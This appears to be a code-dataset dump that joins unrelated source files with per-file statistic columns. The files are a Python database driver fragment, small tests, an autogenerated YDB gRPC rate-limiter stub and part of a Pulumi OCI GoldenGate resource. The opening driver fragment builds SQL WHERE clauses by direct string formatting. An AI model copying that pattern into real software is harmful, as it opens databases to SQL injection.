stmt += " WHERE %s" % ' AND '.join(['%s = %s' % (x, constraints[x]) for x in constraints])
if limit > 0:
stmt += " LIMIT %d" % limit
return self.execute(stmt, readRows=True)
SUPPORTED_DRIVERS = {x.__name__.lower(): x for x in Driver.__subclasses__()}
| 35.428571
| 168
| 0.672631
| 572
| 3,968
| 4.554196
| 0.146853
| 0.062188
| 0.038388
| 0.01881
| 0.854127
| 0.854127
| 0.833397
| 0.833397
| 0.833397
| 0.833397
| 0
| 0.003931
| 0.166583
| 3,968
| 111
| 169
| 35.747748
| 0.783792
| 0
| 0
| 0.839623
| 0
| 0
| 0.115171
| 0.005544
| 0.018868
| 0
| 0
| 0
| 0
| 1
| 0.169811
| false
| 0.028302
| 0.028302
| 0.009434
| 0.311321
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a0723c93479a8bbc5ca71dc3546fad9ba304db8
| 68
|
py
|
Python
|
astprint/__init__.py
|
fjarri-attic/astprint
|
b6f5113ed0dd2af0a7ba8b0445fc25ba6d970321
|
[
"MIT"
] | 2
|
2016-12-25T08:13:36.000Z
|
2020-05-11T01:40:00.000Z
|
astprint/__init__.py
|
fjarri-attic/astprint
|
b6f5113ed0dd2af0a7ba8b0445fc25ba6d970321
|
[
"MIT"
] | null | null | null |
astprint/__init__.py
|
fjarri-attic/astprint
|
b6f5113ed0dd2af0a7ba8b0445fc25ba6d970321
|
[
"MIT"
] | 3
|
2016-12-27T07:06:47.000Z
|
2021-01-20T03:22:35.000Z
|
from astprint.code import as_code
from astprint.tree import as_tree
| 22.666667
| 33
| 0.852941
| 12
| 68
| 4.666667
| 0.5
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 68
| 2
| 34
| 34
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
c58bc120f469b17dec4b420c96c455acecd8feb7
| 264
|
py
|
Python
|
ramda/dissoc_test.py
|
jakobkolb/ramda.py
|
982b2172f4bb95b9a5b09eff8077362d6f2f0920
|
[
"MIT"
] | 56
|
2018-08-06T08:44:58.000Z
|
2022-03-17T09:49:03.000Z
|
ramda/dissoc_test.py
|
jakobkolb/ramda.py
|
982b2172f4bb95b9a5b09eff8077362d6f2f0920
|
[
"MIT"
] | 28
|
2019-06-17T11:09:52.000Z
|
2022-02-18T16:59:21.000Z
|
ramda/dissoc_test.py
|
jakobkolb/ramda.py
|
982b2172f4bb95b9a5b09eff8077362d6f2f0920
|
[
"MIT"
] | 5
|
2019-09-18T09:24:38.000Z
|
2021-07-21T08:40:23.000Z
|
from ramda.dissoc import dissoc
from ramda.private.asserts import *
def dissoc_test():
assert_equal(dissoc("b", {"a": 1, "b": 2, "c": 3}), {"a": 1, "c": 3})
def dissoc_curry_test():
assert_equal(dissoc("b")({"a": 1, "b": 2, "c": 3}), {"a": 1, "c": 3})
| 24
| 73
| 0.560606
| 45
| 264
| 3.177778
| 0.377778
| 0.055944
| 0.20979
| 0.293706
| 0.447552
| 0.447552
| 0.447552
| 0.447552
| 0.447552
| 0.447552
| 0
| 0.045662
| 0.170455
| 264
| 10
| 74
| 26.4
| 0.607306
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c5b2079cb9324fbc5d358a048634ed6c352b28be
| 159
|
py
|
Python
|
tests/test_environment.py
|
brunocriado/tcpparser
|
10acb03bb0e594f5930e9e8b29541ec28ed67420
|
[
"MIT"
] | null | null | null |
tests/test_environment.py
|
brunocriado/tcpparser
|
10acb03bb0e594f5930e9e8b29541ec28ed67420
|
[
"MIT"
] | null | null | null |
tests/test_environment.py
|
brunocriado/tcpparser
|
10acb03bb0e594f5930e9e8b29541ec28ed67420
|
[
"MIT"
] | null | null | null |
from tcpparser.environment import exe_exists
def test_exe_exists():
assert exe_exists("iptables") is not None
assert exe_exists("iptabless") is None
| 22.714286
| 45
| 0.767296
| 23
| 159
| 5.086957
| 0.608696
| 0.307692
| 0.25641
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157233
| 159
| 6
| 46
| 26.5
| 0.873134
| 0
| 0
| 0
| 0
| 0
| 0.106918
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c5f22875a0268f39ca8bfa40ab02f84dc9cf4ea3
| 12,755
|
py
|
Python
|
ydb/public/api/grpc/ydb_rate_limiter_v1_pb2_grpc.py
|
gridnevvvit/ydb-python-sdk
|
952f7b4f179595b07711934691d2e15643929cc5
|
[
"Apache-2.0"
] | 2
|
2022-02-18T16:18:52.000Z
|
2022-02-19T20:15:05.000Z
|
ydb/public/api/grpc/ydb_rate_limiter_v1_pb2_grpc.py
|
gridnevvvit/ydb-python-sdk
|
952f7b4f179595b07711934691d2e15643929cc5
|
[
"Apache-2.0"
] | 1
|
2022-02-09T12:49:19.000Z
|
2022-02-21T08:15:36.000Z
|
ydb/public/api/grpc/ydb_rate_limiter_v1_pb2_grpc.py
|
gridnevvvit/ydb-python-sdk
|
952f7b4f179595b07711934691d2e15643929cc5
|
[
"Apache-2.0"
] | 2
|
2022-02-03T14:58:56.000Z
|
2022-02-22T19:42:59.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from ydb.public.api.protos import ydb_rate_limiter_pb2 as ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2
class RateLimiterServiceStub(object):
"""Service that implements distributed rate limiting.
To use rate limiter functionality you need an existing coordination node.
Control plane API
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.CreateResource = channel.unary_unary(
'/Ydb.RateLimiter.V1.RateLimiterService/CreateResource',
request_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.CreateResourceRequest.SerializeToString,
response_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.CreateResourceResponse.FromString,
)
self.AlterResource = channel.unary_unary(
'/Ydb.RateLimiter.V1.RateLimiterService/AlterResource',
request_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AlterResourceRequest.SerializeToString,
response_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AlterResourceResponse.FromString,
)
self.DropResource = channel.unary_unary(
'/Ydb.RateLimiter.V1.RateLimiterService/DropResource',
request_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DropResourceRequest.SerializeToString,
response_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DropResourceResponse.FromString,
)
self.ListResources = channel.unary_unary(
'/Ydb.RateLimiter.V1.RateLimiterService/ListResources',
request_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.ListResourcesRequest.SerializeToString,
response_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.ListResourcesResponse.FromString,
)
self.DescribeResource = channel.unary_unary(
'/Ydb.RateLimiter.V1.RateLimiterService/DescribeResource',
request_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DescribeResourceRequest.SerializeToString,
response_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DescribeResourceResponse.FromString,
)
self.AcquireResource = channel.unary_unary(
'/Ydb.RateLimiter.V1.RateLimiterService/AcquireResource',
request_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AcquireResourceRequest.SerializeToString,
response_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AcquireResourceResponse.FromString,
)
class RateLimiterServiceServicer(object):
"""Service that implements distributed rate limiting.
To use rate limiter functionality you need an existing coordination node.
Control plane API
"""
def CreateResource(self, request, context):
"""Create a new resource in existing coordination node.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def AlterResource(self, request, context):
"""Update a resource in coordination node.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DropResource(self, request, context):
"""Delete a resource from coordination node.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListResources(self, request, context):
"""List resources in given coordination node.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DescribeResource(self, request, context):
"""Describe properties of resource in coordination node.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def AcquireResource(self, request, context):
"""Take units for usage of a resource in coordination node.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_RateLimiterServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'CreateResource': grpc.unary_unary_rpc_method_handler(
servicer.CreateResource,
request_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.CreateResourceRequest.FromString,
response_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.CreateResourceResponse.SerializeToString,
),
'AlterResource': grpc.unary_unary_rpc_method_handler(
servicer.AlterResource,
request_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AlterResourceRequest.FromString,
response_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AlterResourceResponse.SerializeToString,
),
'DropResource': grpc.unary_unary_rpc_method_handler(
servicer.DropResource,
request_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DropResourceRequest.FromString,
response_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DropResourceResponse.SerializeToString,
),
'ListResources': grpc.unary_unary_rpc_method_handler(
servicer.ListResources,
request_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.ListResourcesRequest.FromString,
response_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.ListResourcesResponse.SerializeToString,
),
'DescribeResource': grpc.unary_unary_rpc_method_handler(
servicer.DescribeResource,
request_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DescribeResourceRequest.FromString,
response_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DescribeResourceResponse.SerializeToString,
),
'AcquireResource': grpc.unary_unary_rpc_method_handler(
servicer.AcquireResource,
request_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AcquireResourceRequest.FromString,
response_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AcquireResourceResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Ydb.RateLimiter.V1.RateLimiterService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class RateLimiterService(object):
"""Service that implements distributed rate limiting.
To use rate limiter functionality you need an existing coordination node.
Control plane API
"""
@staticmethod
def CreateResource(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Ydb.RateLimiter.V1.RateLimiterService/CreateResource',
ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.CreateResourceRequest.SerializeToString,
ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.CreateResourceResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def AlterResource(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Ydb.RateLimiter.V1.RateLimiterService/AlterResource',
ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AlterResourceRequest.SerializeToString,
ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AlterResourceResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DropResource(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Ydb.RateLimiter.V1.RateLimiterService/DropResource',
ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DropResourceRequest.SerializeToString,
ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DropResourceResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListResources(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Ydb.RateLimiter.V1.RateLimiterService/ListResources',
ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.ListResourcesRequest.SerializeToString,
ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.ListResourcesResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DescribeResource(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Ydb.RateLimiter.V1.RateLimiterService/DescribeResource',
ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DescribeResourceRequest.SerializeToString,
ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DescribeResourceResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def AcquireResource(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Ydb.RateLimiter.V1.RateLimiterService/AcquireResource',
ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AcquireResourceRequest.SerializeToString,
ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AcquireResourceResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 50.41502
| 145
| 0.714308
| 1,292
| 12,755
| 6.541022
| 0.104489
| 0.053366
| 0.062951
| 0.076441
| 0.844042
| 0.824399
| 0.824399
| 0.761212
| 0.761212
| 0.761212
| 0
| 0.005155
| 0.224304
| 12,755
| 252
| 146
| 50.615079
| 0.848999
| 0.079028
| 0
| 0.5
| 1
| 0
| 0.088595
| 0.057715
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072917
| false
| 0
| 0.010417
| 0.03125
| 0.130208
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c5f8a1fa48d528b36896403e6a0ce66bab37764b
| 76
|
py
|
Python
|
core/utils/__init__.py
|
js-fan/MCIC
|
a98927e2d88452d96f1fba99a5dc25a5f518caa8
|
[
"MIT"
] | 1
|
2021-07-19T21:52:46.000Z
|
2021-07-19T21:52:46.000Z
|
core/utils/__init__.py
|
js-fan/MCIC
|
a98927e2d88452d96f1fba99a5dc25a5f518caa8
|
[
"MIT"
] | null | null | null |
core/utils/__init__.py
|
js-fan/MCIC
|
a98927e2d88452d96f1fba99a5dc25a5f518caa8
|
[
"MIT"
] | null | null | null |
from .image_tools import *
from .dataset_tools import *
from .misc import *
| 19
| 28
| 0.763158
| 11
| 76
| 5.090909
| 0.545455
| 0.392857
| 0.535714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 76
| 3
| 29
| 25.333333
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a8664ad6fc1e1847e2ae541e0bd17d4d606ecc9c
| 55,540
|
py
|
Python
|
sdk/python/pulumi_oci/goldengate/deployment.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/goldengate/deployment.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/goldengate/deployment.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['DeploymentArgs', 'Deployment']
@pulumi.input_type
class DeploymentArgs:
def __init__(__self__, *,
compartment_id: pulumi.Input[str],
cpu_core_count: pulumi.Input[int],
deployment_type: pulumi.Input[str],
display_name: pulumi.Input[str],
is_auto_scaling_enabled: pulumi.Input[bool],
license_model: pulumi.Input[str],
subnet_id: pulumi.Input[str],
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deployment_backup_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ogg_data: Optional[pulumi.Input['DeploymentOggDataArgs']] = None):
"""
The set of arguments for constructing a Deployment resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment being referenced.
:param pulumi.Input[int] cpu_core_count: (Updatable) The Minimum number of OCPUs to be made available for this Deployment.
:param pulumi.Input[str] deployment_type: The deployment type.
:param pulumi.Input[str] display_name: (Updatable) An object's Display Name.
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Deployment's CPU core count.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to a Deployment.
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet being referenced.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Tags defined for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deployment_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup being referenced.
:param pulumi.Input[str] description: (Updatable) Metadata about this specific object.
:param pulumi.Input[str] fqdn: (Updatable) A three-label Fully Qualified Domain Name (FQDN) for a resource.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) A simple key-value pair that is applied without any predefined name, type, or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[bool] is_public: (Updatable) True if this object is publicly available.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) An array of [Network Security Group](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/networksecuritygroups.htm) OCIDs used to define network access for a deployment.
:param pulumi.Input['DeploymentOggDataArgs'] ogg_data: (Updatable) Deployment Data for creating an OggDeployment
"""
pulumi.set(__self__, "compartment_id", compartment_id)
pulumi.set(__self__, "cpu_core_count", cpu_core_count)
pulumi.set(__self__, "deployment_type", deployment_type)
pulumi.set(__self__, "display_name", display_name)
pulumi.set(__self__, "is_auto_scaling_enabled", is_auto_scaling_enabled)
pulumi.set(__self__, "license_model", license_model)
pulumi.set(__self__, "subnet_id", subnet_id)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if deployment_backup_id is not None:
pulumi.set(__self__, "deployment_backup_id", deployment_backup_id)
if description is not None:
pulumi.set(__self__, "description", description)
if fqdn is not None:
pulumi.set(__self__, "fqdn", fqdn)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if is_public is not None:
pulumi.set(__self__, "is_public", is_public)
if nsg_ids is not None:
pulumi.set(__self__, "nsg_ids", nsg_ids)
if ogg_data is not None:
pulumi.set(__self__, "ogg_data", ogg_data)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment being referenced.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="cpuCoreCount")
def cpu_core_count(self) -> pulumi.Input[int]:
"""
(Updatable) The Minimum number of OCPUs to be made available for this Deployment.
"""
return pulumi.get(self, "cpu_core_count")
@cpu_core_count.setter
def cpu_core_count(self, value: pulumi.Input[int]):
pulumi.set(self, "cpu_core_count", value)
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> pulumi.Input[str]:
"""
The deployment type.
"""
return pulumi.get(self, "deployment_type")
@deployment_type.setter
def deployment_type(self, value: pulumi.Input[str]):
pulumi.set(self, "deployment_type", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Input[str]:
"""
(Updatable) An object's Display Name.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: pulumi.Input[str]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="isAutoScalingEnabled")
def is_auto_scaling_enabled(self) -> pulumi.Input[bool]:
"""
(Updatable) Indicates if auto scaling is enabled for the Deployment's CPU core count.
"""
return pulumi.get(self, "is_auto_scaling_enabled")
@is_auto_scaling_enabled.setter
def is_auto_scaling_enabled(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_auto_scaling_enabled", value)
@property
@pulumi.getter(name="licenseModel")
def license_model(self) -> pulumi.Input[str]:
"""
(Updatable) The Oracle license model that applies to a Deployment.
"""
return pulumi.get(self, "license_model")
@license_model.setter
def license_model(self, value: pulumi.Input[str]):
pulumi.set(self, "license_model", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> pulumi.Input[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet being referenced.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: pulumi.Input[str]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Tags defined for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="deploymentBackupId")
def deployment_backup_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup being referenced.
"""
return pulumi.get(self, "deployment_backup_id")
@deployment_backup_id.setter
def deployment_backup_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deployment_backup_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Metadata about this specific object.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def fqdn(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A three-label Fully Qualified Domain Name (FQDN) for a resource.
"""
return pulumi.get(self, "fqdn")
@fqdn.setter
def fqdn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fqdn", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) A simple key-value pair that is applied without any predefined name, type, or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) True if this object is publicly available.
"""
return pulumi.get(self, "is_public")
@is_public.setter
def is_public(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_public", value)
@property
@pulumi.getter(name="nsgIds")
def nsg_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) An array of [Network Security Group](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/networksecuritygroups.htm) OCIDs used to define network access for a deployment.
"""
return pulumi.get(self, "nsg_ids")
@nsg_ids.setter
def nsg_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "nsg_ids", value)
@property
@pulumi.getter(name="oggData")
def ogg_data(self) -> Optional[pulumi.Input['DeploymentOggDataArgs']]:
"""
(Updatable) Deployment Data for creating an OggDeployment
"""
return pulumi.get(self, "ogg_data")
@ogg_data.setter
def ogg_data(self, value: Optional[pulumi.Input['DeploymentOggDataArgs']]):
pulumi.set(self, "ogg_data", value)
@pulumi.input_type
class _DeploymentState:
def __init__(__self__, *,
compartment_id: Optional[pulumi.Input[str]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deployment_backup_id: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
deployment_url: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_healthy: Optional[pulumi.Input[bool]] = None,
is_latest_version: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
license_model: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ogg_data: Optional[pulumi.Input['DeploymentOggDataArgs']] = None,
private_ip_address: Optional[pulumi.Input[str]] = None,
public_ip_address: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Deployment resources.
